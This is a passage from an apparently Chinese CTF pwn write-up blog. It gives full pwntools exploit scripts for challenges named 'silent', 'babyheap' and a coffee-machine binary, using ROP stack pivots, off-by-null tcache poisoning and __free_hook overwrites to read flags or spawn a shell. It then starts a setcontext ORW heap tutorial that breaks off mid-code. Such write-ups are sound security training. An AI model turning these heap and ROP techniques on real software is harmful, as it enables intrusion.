class="hljs-built_in">p64</span>(read_ptr)+b<span class="hljs-string">'./flag\x00\x00'</span><br><span class="hljs-function"><span class="hljs-title">s</span><span class="hljs-params">(payload1)</span></span><br></code></pre></td></tr></table></figure><p>Finally, pivot the stack once more and run an open/read/write (ORW) chain to read the flag.</p><p>Full exploit:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span 
class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./silent"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">'172.10.0.8'</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 9999<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br><span class="hljs-comment"># add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; 
ret</span><br>magic = 0x00000000004007e8<br><br><span class="hljs-attribute">pop_rdi</span>=0x0000000000400963<br><span class="hljs-attribute">pop_rsi_r15</span>=0x0000000000400961<br><span class="hljs-attribute">read_plt</span>=elf.plt[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">read_got</span>=elf.got[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">bss</span>=0x000000000601040<br><span class="hljs-attribute">read_ptr</span>=0x0000000004008DC<br><span class="hljs-attribute">leave_ret</span>=0x0000000000400876<br><span class="hljs-attribute">stdout</span>=0x000000000601020<br><span class="hljs-attribute">csu_1</span>=0x000000000400956<br><span class="hljs-attribute">csu_2</span>=0x000000000400940<br><span class="hljs-attribute">pop_rbx_rbp_r12_r13_r14_r15</span>=0x000000000040095A<br><span class="hljs-attribute">pop_rbp</span>=0x0000000000400788<br><br><span class="hljs-attribute">payload</span>=b'A'*0x40+b'A'*8+p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0xffffffffffc94210)+p64(stdout+0x3d)+p64(0)*4+p64(magic)+p64(pop_rsi_r15)+p64(0x601b10)+p64(0)+p64(read_plt)+p64(pop_rbp)+p64(0x601b10-8)+p64(leave_ret)<br>s(payload)<br><br><span class="hljs-attribute">payload1</span>=p64(pop_rbx_rbp_r12_r13_r14_r15)+p64(0)+p64(1)+p64(0x601020)+p64(elf.got[<span class="hljs-string">'alarm'</span>])+p64(0)<span class="hljs-number">*2</span>+p64(csu_2)+p64(pop_rsi_r15)+p64(0x601310)+p64(0)+p64(1)+p64(2)+p64(3)+p64(4)+p64(pop_rbp)+p64(0x601a00+0x40)+p64(read_ptr)+b<span class="hljs-string">'./flag\x00\x00'</span><br>s(payload1)<br><br><span class="hljs-attribute">libcbase</span>=uu64()-libc.sym[<span class="hljs-string">'alarm'</span>]<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span 
class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><span class="hljs-attribute">pop_rsi</span>=0x0000000000023a6a+libcbase<br><span class="hljs-attribute">pop_rdx</span>=0x0000000000001b96+libcbase<br><br><span class="hljs-attribute">orw</span>=b'A'*0x40+b'A'*8+p64(pop_rdi)+p64(0x601b10 + len(payload1) - 8)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(open)<br>orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x800))+p64(pop_rdx)+p64(0x100)+p64(read)<br>orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x800))+p64(pop_rdx)+p64(0x100)+p64(write)<br>io.send(orw)<br><br>ia()<br></code></pre></td></tr></table></figure><h1 id="babyheap"><a href="#babyheap" class="headerlink" title="babyheap"></a>babyheap</h1><p>A standard menu challenge: both edit and add contain an off-by-null bug, and the libc is 2.38. Following henry's approach the exploit targets the stack: it leaks a stack address through stdout and environ, then uses the tcache to obtain an allocation over a saved return address and writes a ROP chain there.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202311061610122.png" alt="image-20231106161057065"></p><p>Exploit:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span 
class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./babyheap"</span><br>elf = ELF(banary)<br>libc = ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.38-1ubuntu6_amd64/libc.so.6"</span>)<br><span class="hljs-comment">#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span 
class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(12),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def menu(opt):<br> sla(<span class="hljs-string">'>>'</span>,str(opt))<br> # sl(str(opt))<br><br>def <span class="hljs-built_in">add</span>(size,data):<br> menu(1)<br> sla(b<span class="hljs-string">"input your name size"</span>,str(size))<br> sla(b<span class="hljs-string">"input your name"</span>,data)<br><br>def delete(index):<br> menu(4)<br> sla(b<span class="hljs-string">'input index\n'</span>,str(index))<br><br>def show(index):<br> menu(3)<br> sla(b<span class="hljs-string">'input index\n'</span>,str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,size,name):<br> menu(2)<br> sla(b<span class="hljs-string">'input index'</span>,str(index))<br> sla(b<span class="hljs-string">'input your name size'</span>,str(size))<br> sa(b<span class="hljs-string">'input your name'</span>,name)<br><br><br>ru(<span class="hljs-string">"0x"</span>)<br><span 
class="hljs-attribute">heapbase</span>=iuu64()-0x2a0<br>lg(<span class="hljs-string">"heapbase"</span>)<br><span class="hljs-attribute">fake_size</span>=0x1940<br><span class="hljs-attribute">fake_chunk</span>=p64(0)+p64(fake_size)+p64(heapbase+0x2c0)*2<br><br><span class="hljs-comment">#off by null</span><br><span class="hljs-built_in">add</span>(0x4f8,fake_chunk)#0<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#1<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#2<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#3<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#4<br><span class="hljs-built_in">add</span>(0x408,b<span class="hljs-string">'AAAA'</span>)#5<br><span class="hljs-built_in">add</span>(0x4f8,b<span class="hljs-string">'AAAA'</span>)#6<br><span class="hljs-built_in">add</span>(0x4f8,b<span class="hljs-string">'AAAA'</span>)#7<br><span class="hljs-attribute">payload</span>=b'A'*0x400+p64(fake_size)<br><span class="hljs-built_in">edit</span>(5,0x408,payload)<br>delete(6)<br><br><span class="hljs-comment">#leak libc</span><br><span class="hljs-built_in">add</span>(0x4e8,b<span class="hljs-string">'AAAA'</span>)#6<br><span class="hljs-built_in">add</span>(0x480,b<span class="hljs-string">'AAAA'</span>)#8<br><span class="hljs-built_in">add</span>(0x480,b<span class="hljs-string">'AAAA'</span>)#9<br>delete(8)<br><span class="hljs-built_in">add</span>(0x490,b<span class="hljs-string">'AAAA'</span>)#8<br>show(1)<br><span class="hljs-attribute">libcbase</span>=uu64()-0x1ff110<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">system</span>=libcbase+libc.sym[<span class="hljs-string">'system'</span>]<br><span class="hljs-attribute">bin_sh</span>=libcbase+next(libc.search(b'/bin/sh\x00'))<br><span class="hljs-attribute">pop_rdi</span>=libcbase+0x0000000000028715<br><span 
class="hljs-attribute">environ</span>=libcbase+0x206258<br><span class="hljs-attribute">stdout</span>=libcbase+0x1ff7a0<br><span class="hljs-attribute">ret</span>=libcbase+0x0000000000026a3e<br><br><span class="hljs-comment">#2 attack tcache_struct</span><br>delete(2)<br>delete(3)<br><span class="hljs-attribute">payload</span>=b'A'*0x380+p64(0)+p64(0x411)+p64((heapbase+0x10)^(heapbase>>12))<br><span class="hljs-built_in">edit</span>(9,0x480,payload)<br>sl(b<span class="hljs-string">'1'</span>)<br><span class="hljs-built_in">add</span>(0x400,b<span class="hljs-string">'AAAA'</span>)#2<br><span class="hljs-attribute">payload</span>=p64(1)+p64(0)*14+p64(0x007000000000000)+p64(0x000556111e1e2a0)<br><span class="hljs-attribute">payload</span>=payload.ljust(0x278,b'\x00')+p64(stdout)<br><span class="hljs-built_in">add</span>(0x400,payload)#3<br><br><span class="hljs-comment">#leak stack</span><br><span class="hljs-attribute">payload</span>=p64(0xfbad1800)+p64(0)*3+p64(environ)+p64(environ+8)*4<br><span class="hljs-built_in">add</span>(0x400,payload)<br><span class="hljs-attribute">stack</span>=uu64()<br>lg(<span class="hljs-string">"stack"</span>)<br><span class="hljs-attribute">ret_addr</span>=stack-0x120<br>lg(<span class="hljs-string">"ret_addr"</span>)<br><br><span class="hljs-attribute">payload</span>=p64(1)+p64(0)*14+p64(0x007000000000000) + p64(0x0000556111e1e2a0)<br><span class="hljs-attribute">payload</span>=payload.ljust(0x278,b'\x00')+p64(ret_addr-8)<br><span class="hljs-built_in">edit</span>(3,0x380,payload)<br><br><span class="hljs-attribute">payload1</span>=p64(0)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system)<br>sl(b<span class="hljs-string">'1'</span>)<br><span class="hljs-built_in">add</span>(0x400,payload1)<br><br>menu(5)<br>ia()<br></code></pre></td></tr></table></figure><h1 id="atuo-coffee-sale-machine"><a href="#atuo-coffee-sale-machine" class="headerlink" title="atuo_coffee_sale_machine"></a>atuo_coffee_sale_machine</h1><p>exp:</p><figure 
class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> ctypes <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> struct <span class="hljs-keyword">import</span> pack<br>banary = <span class="hljs-string">"./pwn"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br>libc=ELF(<span class="hljs-string">"/home/youlin/glibc-all-in-one/libs/2.31-0ubuntu9.9_amd64/libc.so.6"</span>)<br>ip = 
<span class="hljs-string">'172.10.0.9'</span><br>port = <span class="hljs-number">8888</span><br>local = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dbg</span>():<br> gdb.attach(io)<br> pause()<br><br>s = <span class="hljs-keyword">lambda</span> data : io.send(data)<br>sl = <span class="hljs-keyword">lambda</span> data : io.sendline(data)<br>sa = <span class="hljs-keyword">lambda</span> text, data : io.sendafter(text, data)<br>sla = <span class="hljs-keyword">lambda</span> text, data : io.sendlineafter(text, data)<br>r = <span class="hljs-keyword">lambda</span> : io.recv()<br>ru = <span class="hljs-keyword">lambda</span> text : io.recvuntil(text)<br>uu32 = <span class="hljs-keyword">lambda</span> : u32(io.recvuntil(<span class="hljs-string">b"\xff"</span>)[-<span class="hljs-number">4</span>:].ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b'\x00'</span>))<br>uu64 = <span class="hljs-keyword">lambda</span> : u64(io.recvuntil(<span class="hljs-string">b"\x7f"</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b"\x00"</span>))<br>iuu32 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">10</span>),<span class="hljs-number">16</span>)<br>iuu64 = <span class="hljs-keyword">lambda</span> : <span class="hljs-built_in">int</span>(io.recv(<span class="hljs-number">6</span>),<span class="hljs-number">16</span>)<br>uheap = <span class="hljs-keyword">lambda</span> 
: u64(io.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b'\x00'</span>))<br>lg = <span class="hljs-keyword">lambda</span> data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, <span class="hljs-built_in">eval</span>(data)))<br>ia = <span class="hljs-keyword">lambda</span> : io.interactive()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">cmd</span>(<span class="hljs-params">choice</span>):<br>ru(<span class="hljs-string">">>>"</span>)<br>sl(<span class="hljs-built_in">str</span>(choice))<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">sell</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>,flag=<span class="hljs-number">0</span>,content=<span class="hljs-string">'youlin'</span></span>):<br>cmd(<span class="hljs-number">1</span>)<br>sla(<span class="hljs-string">'want to buy\n'</span>, <span class="hljs-built_in">str</span>(<span class="hljs-built_in">id</span>))<br><span class="hljs-keyword">if</span> flag:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'Y'</span>)<br>sa(<span class="hljs-string">'need in coffee\n'</span>, content)<br><span class="hljs-keyword">else</span>:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'N'</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">buy</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>, flag=<span class="hljs-number">0</span>, content=<span class="hljs-string">'youlin'</span></span>):<br>cmd(<span class="hljs-number">1</span>)<br>sla(<span class="hljs-string">'want to buy\n'</span>, <span class="hljs-built_in">str</span>(<span class="hljs-built_in">id</span>))<br><span class="hljs-keyword">if</span> flag:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'Y'</span>)<br>sa(<span 
class="hljs-string">'need in coffee\n'</span>, content)<br><span class="hljs-keyword">else</span>:<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'N'</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">admin</span>():<br>cmd(<span class="hljs-number">4421</span>)<br>sa(<span class="hljs-string">'admin password\n'</span>, <span class="hljs-string">b'just pwn it'</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">back</span>():<br>cmd(<span class="hljs-number">3</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">replenish</span>(<span class="hljs-params"><span class="hljs-built_in">id</span></span>):<br>admin()<br>cmd(<span class="hljs-number">1</span>)<br>cmd(<span class="hljs-built_in">id</span>)<br>back()<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">change</span>(<span class="hljs-params"><span class="hljs-built_in">id</span>, coffee, content</span>):<br>admin()<br>cmd(<span class="hljs-number">2</span>)<br>cmd(<span class="hljs-built_in">id</span>)<br>cmd(coffee)<br>sa(<span class="hljs-string">'your content\n'</span>, content)<br>back()<br><br>buy(<span class="hljs-number">1</span>)<br>buy(<span class="hljs-number">1</span>)<br>change(<span class="hljs-number">1</span>, <span class="hljs-number">2</span>, p64(<span class="hljs-number">0x4062F0</span>))<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>buy(<span class="hljs-number">2</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>replenish(<span class="hljs-number">2</span>)<br>change(<span class="hljs-number">2</span>, <span class="hljs-number">7</span>, p64(<span 
class="hljs-number">0x406068</span>))<br>cmd(<span class="hljs-number">1</span>)<br>libc_base = uu64() - libc.sym[<span class="hljs-string">'atol'</span>]<br>lg(<span class="hljs-string">'libc_base'</span>)<br><br>sla(<span class="hljs-string">'want to buy\n'</span>, <span class="hljs-string">b'2'</span>)<br>sla(<span class="hljs-string">'add something?Y/N\n'</span>, <span class="hljs-string">b'N'</span>)<br>buy(<span class="hljs-number">2</span>)<br>change(<span class="hljs-number">2</span>, <span class="hljs-number">2</span>, p64(libc_base + libc.sym[<span class="hljs-string">'__free_hook'</span>] - <span class="hljs-number">8</span>))<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>sell(<span class="hljs-number">3</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>replenish(<span class="hljs-number">3</span>)<br>change(<span class="hljs-number">3</span>, <span class="hljs-number">7</span>, p64(<span class="hljs-number">0</span>) + p64(libc_base + libc.sym[<span class="hljs-string">'system'</span>]))<br>buy(<span class="hljs-number">3</span>, <span class="hljs-number">1</span>, <span class="hljs-string">b'/bin/sh'</span>)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>orw_heap</title>
<link href="/2023/10/24/orw-heap/"/>
<url>/2023/10/24/orw-heap/</url>
<content type="html"><![CDATA[<p>Another gap-filling post. When I was learning the heap, after covering some basics I went straight to house of banana, and I have to marvel at how powerful banana is: many heap challenges (including orw ones) can be solved with the banana exploitation chain, so I never studied the setcontext technique carefully and only roughly knew it existed. But a client asked about it during a training session, so I went back and studied it properly (thanks to on3 for the help).</p><h1 id="setcontext介绍"><a href="#setcontext介绍" class="headerlink" title="setcontext overview"></a>setcontext overview</h1><p>The technique relies on the gadget at setcontext+53: controlling rsp lets us control the program's return address, and rsp itself is controlled through the address stored at rdi+0xa0.</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241932248.png" alt="image-20231024193237139"></p><h2 id="2-27利用方法"><a href="#2-27利用方法" class="headerlink" title="Exploitation on 2.27"></a>Exploitation on 2.27</h2><p>Overwrite free_hook with setcontext, lay out the orw chain on a heap chunk, write the address of the orw chain at chunk address+0xa0 and the address of a ret gadget at +0xa8, and the orw chain executes.</p><h1 id="例题"><a href="#例题" class="headerlink" title="Example challenge"></a>Example challenge</h1><p>Link: <a href="https://pan.baidu.com/s/1Pnl09FAe6OofcRl5GicoOA?pwd=p87w">https://pan.baidu.com/s/1Pnl09FAe6OofcRl5GicoOA?pwd=p87w</a> </p><p>A quick analysis of the challenge shows that it enables a sandbox</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241940969.png" alt="image-20231024194007909"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241940179.png" alt="image-20231024194033136"></p><p>and the program itself has a UAF</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202310241941385.png" alt="image-20231024194107350"></p><p>So the exploitation plan is: first leak libc, then overwrite free_hook with setcontext and lay out the orw chain on the heap chunk</p><p>First leak libc and compute the gadgets we will need</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span 
class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x410,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">0</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x10,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">1</span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">0</span>)</span></span><br><span class="hljs-function"><span class="hljs-title">show</span><span class="hljs-params">(<span class="hljs-number">0</span>)</span></span><br>libcbase=<span class="hljs-built_in">uu64</span>()-<span class="hljs-number">0</span>x3ebca0<br><span class="hljs-function"><span class="hljs-title">lg</span><span class="hljs-params">(<span class="hljs-string">"libcbase"</span>)</span></span><br>malloc_hook=libcbase+libc<span 